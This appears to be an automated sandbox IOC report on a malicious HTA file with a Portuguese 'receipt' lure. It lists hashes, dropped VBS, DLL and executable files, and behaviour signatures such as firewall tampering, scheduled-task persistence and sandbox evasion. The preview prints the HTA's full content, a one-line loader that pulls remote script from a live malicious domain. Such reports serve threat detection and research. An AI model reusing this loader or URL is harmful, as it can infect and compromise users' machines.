Automated Malware Analysis IOC Report for

Details

Filetype:	HTML document, ASCII text, with CRLF line terminators
Entropy:	4.781957554958
Filename:	#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
Filesize:	140
MD5:	57368b1f9ef19b72f8d342affe2efd77
SHA1:	6bd0579bb92f64902f587f53670e2b263e611a9b
SHA256:	390bb4f14a9be0faa0f5d0b4dc6fdfcca578b746a119e98d745650cff14976d9
SHA512:	13618d90740a2e12d3f4205a467b35c1fbaaa597d0629f1d0ce2eaf4818e5bc15d734b3ee6f4516853c356d665937f2aee660aee5f2a45b0e66bab9c69f09614
SSDEEP:	3:qVoB3tObvXAK4JKZVqIOR1XFdIcG+XFSILGXIMBWhtoAcMBcacWWGb:q43tEvXAz5tGgLVMch0MWXfGb
Preview:	<html>..<head>..<script src="https://apps.downloadaps.com/pt/6720c012c774c/js/6720c012c76dc.js"></script>..</head>..<body>..</body>..</html>

Details

File:	C:\Users\Public\6720c012c78cd.vbs
Category:	modified
Dump:	6720c012c78cd.vbs.4.dr
ID:	dr_3
Target ID:	4
Process:	C:\Windows\SysWOW64\curl.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	4.998584615752592
Encrypted:	false
Size:	2659
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: Suspicious MSHTA Child Process	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Spawns processes	System Summary	Process Injection

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\96LGQ1XY\6720c012c78c7[1].vbs
Category:	dropped
Dump:	6720c012c78c7[1].vbs.0.dr
ID:	dr_1
Target ID:	0
Process:	C:\Windows\SysWOW64\mshta.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	5.434782169433044
Encrypted:	false
Size:	723
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Legitimate Application Dropped Script	System Summary

Details

File:	C:\_6720c012c774c\BLOCKBUSTER.exe
Category:	dropped
Dump:	BLOCKBUSTER.exe.7.dr
ID:	dr_10
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy:	6.8003113138269855
Encrypted:	false
Size:	9571304
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Modifies the windows firewall	Lowering of HIPS / PFW / Operating System Security Settings	Disable or Modify Tools
Sigma detected: Invoke-Obfuscation CLIP+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation VAR+ Launcher	System Summary
Uses netsh to modify the Windows network and firewall settings	Lowering of HIPS / PFW / Operating System Security Settings	Disable or Modify Tools
Uses schtasks.exe or at.exe to add and modify task schedules	Boot Survival	Scheduled Task/Job
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)	Lowering of HIPS / PFW / Operating System Security Settings	Security Software Discovery Windows Management Instrumentation
Contains long sleeps (>= 3 min)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)	Malware Analysis System Evasion
Contains medium sleeps (>= 30s)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Creates guard pages, often used to prevent reverse engineering and debugging	Anti Debugging	Disable or Modify Tools
Creates mutexes	System Summary
Creates temporary files	System Summary
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Parts of this applications are using Borland Delphi (Probably coded in Delphi)	System Summary
Queries a list of all running processes	Malware Analysis System Evasion	Process Discovery
Spawns processes	System Summary	Process Injection
Tries to load missing DLLs	System Summary	DLL Side-Loading

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\5IQBCSP1\pt2810[1].zip
Category:	dropped
Dump:	pt2810[1].zip.7.dr
ID:	dr_4
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Entropy:	7.974970402626158
Encrypted:	false
Size:	40199937
Whitelisted:	false

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\6720c012c76dc[1].js
Category:	dropped
Dump:	6720c012c76dc[1].js.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Windows\SysWOW64\mshta.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	5.4456791629875365
Encrypted:	false
Size:	345
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Creates files inside the user directory	System Summary	Masquerading

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Category:	dropped
Dump:	f01b4d95cf55d32a.automaticDestinations-ms.7.dr
ID:	dr_6
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	Composite Document File V2 Document, Cannot read section info
Entropy:	4.127573243916201
Encrypted:	false
Size:	6144
Whitelisted:	false

Details

File:	C:\_6720c012c774c\7zxa.dll
Category:	dropped
Dump:	7zxa.dll.7.dr
ID:	dr_8
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy:	5.720370255958521
Encrypted:	false
Size:	77475840
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Drops PE files	Persistence and Installation Behavior

Details

File:	C:\_6720c012c774c\BLOCKBUSTER.dll
Category:	dropped
Dump:	BLOCKBUSTER.dll.7.dr
ID:	dr_9
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	data
Entropy:	7.447705234612919
Encrypted:	false
Size:	425472
Whitelisted:	false

Details

File:	C:\_6720c012c774c\hc.dll
Category:	dropped
Dump:	hc.dll.7.dr
ID:	dr_11
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	data
Entropy:	7.330570271317417
Encrypted:	false
Size:	1561600
Whitelisted:	false

Details

File:	C:\_6720c012c774c\unrar.dll
Category:	dropped
Dump:	unrar.dll.7.dr
ID:	dr_7
Target ID:	7
Process:	C:\Windows\SysWOW64\wscript.exe
Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy:	6.475102022731023
Encrypted:	false
Size:	178176
Whitelisted:	false

Signature Hits	Behavior Group	Mitre Attack
Drops PE files	Persistence and Installation Behavior

Details

File:	\Device\ConDrv
Category:	dropped
Dump:	ConDrv.36.dr
ID:	dr_12
Target ID:	36
Process:	C:\Windows\SysWOW64\netsh.exe
Type:	ASCII text, with CRLF line terminators
Entropy:	2.2359263506290326
Encrypted:	false
Size:	7
Whitelisted:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta

Files

URLs

Domains

IPs

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta

Files

URLs

Domains

IPs

IOC Report
#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta